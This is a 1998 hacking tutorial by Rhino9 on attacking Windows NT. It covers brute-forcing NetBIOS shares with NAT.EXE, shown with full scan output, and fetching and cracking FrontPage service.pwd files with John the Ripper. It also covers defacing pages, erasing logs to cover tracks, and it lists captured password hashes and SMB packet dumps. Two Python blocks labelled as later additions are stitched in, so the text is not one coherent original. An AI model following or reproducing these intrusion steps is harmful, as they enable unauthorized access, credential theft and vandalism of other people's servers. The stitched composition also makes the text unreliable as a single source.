==========Windows NT Vulnerabilities Version 2==================================

by Vacuum & Chame|eon of Rhino9 [www.rhino9.org]
[http://www.technotronic.com -- vacuum@technotronic.com]
March 11, 1998

Nothing changed in this updated version other than a few minor spelling errors and irrelevant information removed. Enjoy.

Frontpage (Hacking)
Don't let others fool you: chame|eon and I were the first to decrypt service.pwd files.
NetBIOS Shares in depth.

All mentioned programs available at www.technotronic.com

==========NetBIOS Attack Program==================================

Verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

OPTIONS

  -o         Specify the output file. All results from the scan will be written to the specified file, in addition to standard output.

  -u         Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server. Usernames should appear one per line in the specified file.

  -p         Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server. Passwords should appear one per line in the specified file.

  <address>  Addresses should be specified in comma-delimited format, with no spaces. Valid address specifications include:

               hostname              - "hostname" is added
               127.0.0.1-127.0.0.3   - adds addresses 127.0.0.1 through 127.0.0.3
               127.0.0.1-3           - adds addresses 127.0.0.1 through 127.0.0.3
               127.0.0.1-3,7,10-20   - adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20
               hostname,127.0.0.1-3  - adds "hostname" and 127.0.0.1 through 127.0.0.3

             All combinations of hostnames and address ranges as specified above are valid.

Note that NAT.EXE will IP-scan for NetBIOS shares over any address list specified as above.
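The address grammar documented above, implemented as a parser so that an administrator running an inventory scan can see exactly which hosts a specification covers before anything is touched. This is an added example, not code from the original text or from NAT.EXE; two details the usage text leaves open are assumptions (ranges may not cross the first three octets, and a bare number with no preceding dotted entry is treated as a hostname).

```python
"""Expand a NAT.EXE-style <address> specification into individual targets.

Grammar (from the usage text):
    hostname                -> "hostname"
    127.0.0.1-127.0.0.3     -> 127.0.0.1, 127.0.0.2, 127.0.0.3
    127.0.0.1-3             -> the same, short form
    127.0.0.1-3,7,10-20     -> extra last-octet values after a dotted entry
    hostname,127.0.0.1-3    -> any comma-separated mix of the above
Assumed here (the text does not say): a range may not cross the first three
octets, and a bare number with no preceding dotted entry is a hostname.
"""
import re

IPV4 = re.compile(r"^(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})$")
OCTET_RANGE = re.compile(r"^(\d{1,3})(?:-(\d{1,3}))?$")


def _octet(text):
    n = int(text)
    if not 0 <= n <= 255:
        raise ValueError(f"octet out of range: {text}")
    return n


def _span(prefix, lo, hi):
    if hi < lo:
        raise ValueError(f"reversed range: {prefix}.{lo}-{hi}")
    return [f"{prefix}.{o}" for o in range(lo, hi + 1)]


def expand_address_spec(spec):
    """Return the ordered, de-duplicated targets named by spec, or raise ValueError."""
    if not spec or " " in spec:
        raise ValueError("address list must be non-empty and contain no spaces")
    targets = []
    prefix = None                      # first three octets of the last dotted entry
    for item in spec.split(","):
        if not item:
            raise ValueError("empty element in address list")
        head, _, tail = item.partition("-")
        dotted = IPV4.match(head)
        if dotted:
            prefix, lo = dotted.group(1), _octet(dotted.group(2))
            if tail == "":
                hi = lo                                  # single address
            elif IPV4.match(tail):                       # long form a.b.c.d-a.b.c.e
                tail_prefix, tail_octet = IPV4.match(tail).groups()
                if tail_prefix != prefix:
                    raise ValueError(f"range crosses a /24 boundary: {item}")
                hi = _octet(tail_octet)
            else:                                        # short form a.b.c.d-e
                hi = _octet(tail)
            targets.extend(_span(prefix, lo, hi))
        elif prefix is not None and OCTET_RANGE.match(item):
            lo_text, hi_text = OCTET_RANGE.match(item).groups()
            lo = _octet(lo_text)
            hi = _octet(hi_text) if hi_text else lo      # "7" or "10-20" reuse the prefix
            targets.extend(_span(prefix, lo, hi))
        else:
            targets.append(item)                         # anything else is a hostname
    seen, unique = set(), []
    for t in targets:                                    # keep order, drop repeats
        if t not in seen:
            seen.add(t)
            unique.append(t)
    return unique
```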
Comparing NAT.EXE to Microsoft's own executables:

C:\>nbtstat -A 204.73.131.11

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
STUDENT1       <20>  UNIQUE      Registered
STUDENT1       <00>  UNIQUE      Registered
DOMAIN1        <00>  GROUP       Registered
DOMAIN1        <1C>  GROUP       Registered
DOMAIN1        <1B>  UNIQUE      Registered
STUDENT1       <03>  UNIQUE      Registered
DOMAIN1        <1E>  GROUP       Registered
DOMAIN1        <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial listing of NetBIOS name suffixes (the 16th byte of the name):

Computername   <00>  UNIQUE   workstation service name
               <00>  GROUP    domain name
Server         <20>  UNIQUE   Server Service name
Computername   <03>  UNIQUE   Registered by the messenger service. This is the computer name to be added to the LMHOSTS file, which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood.
Username       <03>           Registered by the messenger service.
Domainname     <1B>           Registers the local computer as the master browser for the domain
Domainname     <1C>           Registers the computer as a domain controller for the domain (PDC or BDC)
Domainname     <1D>           Registers the local client as the local segment's master browser for the domain
Domainname     <1E>           Registers as a Group NetBIOS Name
               <BF>           Network Monitor Name
               <BE>           Network Monitor Agent
               <06>           RAS Server
               <1F>           Net DDE
               <21>           RAS Client

C:\>net view 204.73.131.11
Shared resources at 204.73.131.11

Share name   Type         Used as  Comment
------------------------------------------------------------------------------
NETLOGON     Disk                  Logon server share
Test         Disk
The command completed successfully.

NOTE: The C$, ADMIN$ and IPC$ shares are hidden and are not shown.

C:\>net use /?
The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
        [/USER:[domainname\]username]
        [[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]

C:\>net use x: \\204.73.131.11\test
The command completed successfully.

C:\unzipped\nat10bin>net use
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           X:        \\204.73.131.11\test      Microsoft Windows Network
OK                     \\204.73.131.11\test      Microsoft Windows Network
The command completed successfully.

C:\>nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
        Sharename      Type      Comment
        ---------      ----      -------
        ADMIN$         Disk:     Remote Admin
        C$             Disk:     Default share
        IPC$           IPC:      Remote IPC
        NETLOGON       Disk:     Logon server share
        Test           Disk:
[*]--- This machine has a browse list:
        Server               Comment
        ---------            -------
        STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default shares are left at Everyone/Full Control, that is it: the machine is hacked.

==========Frontpage Extension Scanner & Cracker========================

NOTE: This is the pwdump from the web server; the LAN Manager password is set to "password".
Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
mari:1006:********************************:********************************:::
meng:1007:********************************:********************************:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::

The #haccess.ctl file:

# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp

Executing fpservwin.exe allows the FrontPage server extensions to be installed on port 443 (HTTPS, Secure Sockets Layer) or port 80 (HTTP).

NOTE: Note the Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used instead of FrontPage.
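The Limit block above is what stands between an HTTP client and service.pwd, so the first thing to verify on a FrontPage host is that it is present and denies all three methods. The checker below is an added example, not code from the original text or from FrontPage; SAMPLE_GOOD is the #haccess.ctl shown above, SAMPLE_WEAK is a constructed variant that forgot PUT.

```python
"""Audit a FrontPage #haccess.ctl for the <Limit> protection of _vti_pvt.

The <Limit GET POST PUT> block with "deny from all" is what stops the
password file in _vti_pvt from being fetched over HTTP. This checker reports
when the block is missing, when it does not deny everyone, or when one of the
three methods the text calls out is left outside it.
"""
import re

REQUIRED_METHODS = {"GET", "POST", "PUT"}

# The file from the text above (backslash-escaped space kept as in the original).
SAMPLE_GOOD = """\
# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\\ webs/content/_vti_pvt/service.grp
"""

# Constructed weak variant: PUT is not covered by the Limit block.
SAMPLE_WEAK = """\
# -FrontPage-
Options None
<Limit GET POST>
order deny,allow
deny from all
</Limit>
AuthUserFile c:/frontpage\\ webs/content/_vti_pvt/service.pwd
"""

LIMIT_RE = re.compile(r"<Limit\s+([^>]*)>(.*?)</Limit>", re.IGNORECASE | re.DOTALL)
AUTH_RE = re.compile(r"^\s*(Auth\w+)\s+(.*\S)\s*$")


def parse_haccess(text):
    """Return {'limits': [{'methods': set, 'directives': [..]}], 'auth': {name: value}}."""
    limits = []
    for methods, body in LIMIT_RE.findall(text):
        directives = [ln.strip().lower() for ln in body.splitlines() if ln.strip()]
        limits.append({"methods": {m.upper() for m in methods.split()},
                       "directives": directives})
    auth = {}
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            auth[m.group(1)] = m.group(2)
    return {"limits": limits, "auth": auth}


def audit_haccess(text):
    """Return a list of findings; an empty list means the Limit protection is sound."""
    parsed = parse_haccess(text)
    findings = []
    if not parsed["limits"]:
        findings.append("no <Limit> block: service.pwd is fetchable over HTTP")
        return findings
    covered = set()
    for block in parsed["limits"]:
        denies_all = "deny from all" in block["directives"]
        # Any "allow from" line re-opens the directory for someone, so it does not count.
        reopened = any(d.startswith("allow from") for d in block["directives"])
        if denies_all and not reopened:
            covered |= block["methods"]
        else:
            methods = " ".join(sorted(block["methods"]))
            findings.append(f"<Limit {methods}> does not deny everyone")
    missing = REQUIRED_METHODS - covered
    if missing:
        findings.append("methods not denied: " + " ".join(sorted(missing)))
    return findings
```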
The following is a list of the Internet Information Server file locations in relation to the local hard drive (C:) and the web (www.target.com):

C:\InetPub\wwwroot                                      <Home>
C:\InetPub\scripts                                      /Scripts
C:\InetPub\wwwroot\_vti_bin                             /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm                    /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut                    /_vti_bin/_vti_aut
C:\InetPub\cgi-bin                                      /cgi-bin
C:\InetPub\wwwroot\srchadm                              /srchadm
C:\WINNT\System32\inetserv\iisadmin                     /iisadmin
C:\InetPub\wwwroot\_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM          Internet Information Index Server sample
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm  /iisadmin/isadmin

NOTE: Only if Index Server is running under Internet Information Server.

service.pwd is our goal, although lots of servers are not password protected and can be exploited easily. If queryhit.htm is found it can be used to get service.pwd: search for "#filename=*.pwd".

Systems by default will have the FTP service running. C:\InetPub\ftproot is the default location for the FTP service, which by default runs on the standard port 21.

Select the Allow Anonymous Connections check box to allow users using the username "anonymous" to log into your FTP server. Use the User Name and Password dialog boxes to establish the Windows NT user account to use for permissions for all anonymous connections. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within Windows NT; anonymous users do not log on using this user name and password. Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions.
When you installed Internet Information Server, Setup created the account IUSR_computername in the Windows NT User Manager for Domains and in Internet Service Manager. This account was assigned a random password in both Internet Service Manager and the Windows NT User Manager for Domains. If you change the password, you must change it in both places and make sure it matches.

FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to:

  service.pwd   contains the list of users and passwords for the FrontPage web.
  service.grp   contains the list of groups (one group for authors and one for administrators in FrontPage).

On Netscape servers, there are no service.grp files. The Netscape password files are:

  administrators.pwd   for administrators
  authors.pwd          for authors and administrators
  users.pwd            for users, authors, and administrators

NOTE: Name and password are case sensitive.

Scanning PORT 80 or 443 options:

GET /_vti_inf.html                  # Ensures that FrontPage server extensions are installed.
GET /_vti_pvt/service.pwd           # Contains the encrypted password files. Not used on IIS and WebSite servers.
GET /_vti_pvt/authors.pwd           # On Netscape servers only. Encrypted names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log            # If author.log is there it will need to be cleaned to cover your tracks.
GET /samples/search/queryhit.htm

Other ways of obtaining service.pwd:

  http://ftpsearch.com/index.html       search for service.pwd
  http://www.alstavista.digital.com     advanced search for link:"/_vti_pvt/service.pwd"

Attempt to connect to the server using FTP (port 21) with login "anonymous" and password "guest@unknown". The anonymous login will use the internally created IUSR_computername account to assign NT permissions. An incorrect configuration may leave areas vulnerable to attack.
If service.pwd is obtained it will look similar to this:

Vacuum:SGXJVl6OJ9zkE

The above password is apple. Turn it into DES (Unix passwd) format:

Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash

Then run your favorite Unix password cracker, like John The Ripper:

Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]
Flags: -pwfile:<file>[,..]     specify passwd file(s) (wildcards allowed)
       -wordfile:<file>        specify wordlist file
       -restore[:<file>]       restore session [from <file>]
       -user:login|uid[,..]    only crack this (these) user(s)
       -timeout:<time>         abort session after a period of <time> minutes
       -incremental[:<mode>]   incremental mode [using JOHN.INI entry <mode>]
       -single                 single crack mode
       -stdin                  read words from stdin
       -list                   list each word
       -test                   perform a benchmark
       -beep                   beep when a password is found
       -quiet                  do not beep when a password is found (default)
       -noname                 don't use memory for login names

To open a FrontPage web:

On the FrontPage Explorer's File menu, choose Open FrontPage Web.
In the Getting Started dialog box, select Open an Existing FrontPage Web and choose the FrontPage web you want to open. Click More Webs if the web you want to open is not listed. Click OK.
If you are prompted for your author name and password, you will have to decrypt service.pwd, guess, or move on. Enter them in the Name and Password Required dialog box, and click OK.
Alter the existing page, or upload a page of your own.

I have captured the entire hack from connection, to password authentication, to the actual page upload. To view this file, you will need to use Windows NT's Network Monitor and open the file vac.cap.

=====Sniffing ==============================================================

Running a packet sniffer to see how the shares are actually determined:

NOTE: R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..)
This frame is a NetShareEnum request, which requests a list of shared resources.

19  31.348  STUDENT7  *SMBSERVER  R_SRVSVC  RPC Client call srvsvc:NetrShareEnum(..)  STUDENT7  *SMBSERVER  IP

FRAME: Base frame properties
FRAME: Time of capture = Dec 3, 1997 9:12:54.18
FRAME: Time delta from previous physical frame: 0 milliseconds
FRAME: Frame number: 19
FRAME: Total frame length: 238 bytes
FRAME: Capture frame length: 238 bytes
FRAME: Frame data: Number of data bytes remaining = 238 (0x00EE)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C9D
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C93
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 238 (0x00EE)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 224 (0x00E0)
IP: ID = 0x1A08; Proto = TCP; Len: 224
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 224 (0xE0)
IP: Identification = 6664 (0x1A08)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x415E
IP: Source Address = 204.73.131.19
IP: Destination Address = 204.73.131.11
IP: Data: Number of data bytes remaining = 204 (0x00CC)
TCP: .AP..., len: 184, seq: 73409249-73409432, ack: 1505236, win: 8278, src: 1832 dst: 139 (NBT Session)
TCP: Source Port = 0x0728
TCP: Destination Port = NETBIOS Session Service
TCP: Sequence Number = 73409249 (0x46022E1)
TCP: Acknowledgement Number = 1505236 (0x16F7D4)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8278 (0x2056)
TCP: Checksum = 0x40ED
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 184 (0x00B8)
NBT: SS: Session Message, Len: 180
NBT: Packet Type = Session Message
NBT: Packet Flags = 0 (0x0)
NBT: .......0 = Add 0 to Length
NBT: Packet Length = 180 (0xB4)
NBT: SS Data: Number of data bytes remaining = 180 (0x00B4)
SMB: C transact TransactNmPipe, FID = 0x800
SMB: SMB Status = Error Success
SMB: Error class = No Error
SMB: Error code = No Error
SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x00C0 UID = 0x0800
SMB: Tree ID (TID) = 2048 (0x800)
SMB: Process ID (PID) = 31936 (0x7CC0)
SMB: User ID (UID) = 2048 (0x800)
SMB: Multiplex ID (MID) = 192 (0xC0)
SMB: Flags Summary = 24 (0x18)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 0....... = Client command
SMB: flags2 Summary = 32771 (0x8003)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS capabilities
SMB: ..0............. = No paging of IO
SMB: .0.............. = Using SMB status codes
SMB: 1............... = Using UNICODE strings
SMB: Command = R transact
SMB: Word count = 16
SMB: Word parameters
SMB: Total parm bytes = 0
SMB: Total data bytes = 96
SMB: Max parm bytes = 0
SMB: Max data bytes = 1024
SMB: Max setup words = 0 (0x0)
SMB: Transact Flags Summary = 0 (0x0)
SMB: ...............0 = Leave session intact
SMB: ..............0. = Response required
SMB: Transact timeout = 0 (0x0)
SMB: Parameter bytes = 0 (0x0)
SMB: Parameter offset = 84 (0x54)
SMB: Data bytes = 96 (0x60)
SMB: Data offset = 84 (0x54)
SMB: Max setup words = 2
SMB: Setup words
SMB: Pipe function = Transact named pipe (TransactNmPipe)
SMB: File ID (FID) = 2048 (0x800)
SMB: Byte count = 113
SMB: Byte parameters
SMB: File name = \PIPE\
SMB: Transaction data
SMB: Data: Number of data bytes remaining = 96 (0x0060)
MSRPC: c/o RPC Request: call 0x1 opnum 0xF context 0x0 hint 0x48
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Request
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 96 (0x60)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 1 (0x1)
MSRPC: Bind Frame Number = 17 (0x11)
MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
MSRPC: Allocation Hint = 72 (0x48)
MSRPC: Presentation Context Identifier = 0 (0x0)
MSRPC: Operation Number (c/o Request prop. dg header prop) = 15 (0xF)
MSRPC: Stub Data
R_SRVSVC: RPC Client call srvsvc:NetrShareEnum(..)
R_SRVSVC: SRVSVC_HANDLE ServerName = 204.73.131.11
R_SRVSVC: LPSHARE_ENUM_STRUCT InfoStruct {..}
R_SRVSVC: DWORD Level = 1 (0x1)
R_SRVSVC: _SHARE_ENUM_UNION ShareInfo {..}
R_SRVSVC: Switch Value = 1 (0x1)
R_SRVSVC: SHARE_INFO_1_CONTAINER *Level1 {..}
R_SRVSVC: DWORD EntriesRead = 0 (0x0)
R_SRVSVC: LPSHARE_INFO_1 Buffer = 0 (0x0)
R_SRVSVC: DWORD PreferedMaximumLength = 4294967295 (0xFFFFFFFF)

00000: 00 C0 4F C4 8C 9D 00 C0 4F C4 8C 93 08 00 45 00  ..O.....O.....E.
00010: 00 E0 1A 08 40 00 80 06 41 5E CC 49 83 13 CC 49  ....@...A^.I...I
00020: 83 0B 07 28 00 8B 04 60 22 E1 00 16 F7 D4 50 18  ...(...`".....P.
00030: 20 56 40 ED 00 00 00 00 00 B4 FF 53 4D 42 25 00   V@........SMB%.
00040: 00 00 00 18 03 80 24 82 00 00 00 00 00 00 00 00  ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 00 10 00 00 60 00 00  .....|.......`..
00060: 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 54  ...............T
00070: 00 60 00 54 00 02 00 26 00 00 08 71 00 00 5C 00  .`.T...&...q..\.
00080: 50 00 49 00 50 00 45 00 5C 00 00 00 00 2D 05 00  P.I.P.E.\....-..
00090: 00 03 10 00 00 00 60 00 00 00 01 00 00 00 48 00  ......`.......H.
000A0: 00 00 00 00 0F 00 36 1C 14 00 0E 00 00 00 00 00  ......6.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00  ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00  3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 01 00 00 00 A0 FB 12 00 00 00  ................
000E0: 00 00 00 00 00 00 FF FF FF FF 00 00 00 00        ..............

This is the response to the above share request:

27  31.376  *SMBSERVER  STUDENT7  R_SRVSVC  RPC Server response srvsvc:NetrServerGetInfo(..)  *SMBSERVER  STUDENT7  IP

FRAME: Base frame properties
FRAME: Time of capture = Dec 3, 1997 9:12:54.46
FRAME: Time delta from previous physical frame: 7 milliseconds
FRAME: Frame number: 27
FRAME: Total frame length: 230 bytes
FRAME: Capture frame length: 230 bytes
FRAME: Frame data: Number of data bytes remaining = 230 (0x00E6)
ET HERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C93
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C9D
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 230 (0x00E6)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 216 (0x00D8)
IP: ID = 0x3C0E; Proto = TCP; Len: 216
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 216 (0xD8)
IP: Identification = 15374 (0x3C0E)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x1F60
IP: Source Address = 204.73.131.11
IP: Destination Address = 204.73.131.19
IP: Data: Number of data bytes remaining = 196 (0x00C4)
TCP: .AP..., len: 176, seq: 1506074-1506249, ack: 73409903, win: 7314, src: 139 (NBT Session) dst: 1832
TCP: Source Port = NETBIOS Session Service
TCP: Destination Port = 0x0728
TCP: Sequence Number = 1506074 (0x16FB1A)
TCP: Acknowledgement Number = 73409903 (0x460256F)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 7314 (0x1C92)
TCP: Checksum = 0x7C1E
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 176 (0x00B0)
NBT: SS: Session Message, Len: 172
NBT: Packet Type = Session Message
NBT: Packet Flags = 0 (0x0)
NBT: .......0 = Add 0 to Length
NBT: Packet Length = 172 (0xAC)
NBT: SS Data: Number of data bytes remaining = 172 (0x00AC)
SMB: R transact TransactNmPipe (response to frame 26)
SMB: SMB Status = Error Success
SMB: Error class = No Error
SMB: Error code = No Error
SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x01C0 UID = 0x0800
SMB: Tree ID (TID) = 2048 (0x800)
SMB: Process ID (PID) = 31936 (0x7CC0)
SMB: User ID (UID) = 2048 (0x800)
SMB: Multiplex ID (MID) = 448 (0x1C0)
SMB: Flags Summary = 152 (0x98)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 1....... = Server response
SMB: flags2 Summary = 32771 (0x8003)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS capabilities
SMB: ..0............. = No paging of IO
SMB: .0.............. = Using SMB status codes
SMB: 1............... = Using UNICODE strings
SMB: Command = R transact
SMB: Word count = 10
SMB: Word parameters
SMB: Total parm bytes = 0
SMB: Total data bytes = 116
SMB: Parameter bytes = 0 (0x0)
SMB: Parameter offset = 56 (0x38)
SMB: Parameter Displacement = 0 (0x0)
SMB: Data bytes = 116 (0x74)
SMB: Data offset = 56 (0x38)
SMB: Data Displacement = 0 (0x0)
SMB: Max setup words = 0
SMB: Byte count = 117
SMB: Byte parameters
SMB: Pipe function = Transact named pipe (TransactNmPipe)
SMB: Data: Number of data bytes remaining = 116 (0x0074)
MSRPC: c/o RPC Response: call 0x1 context 0x0 hint 0x5C cancels 0x0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Response
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
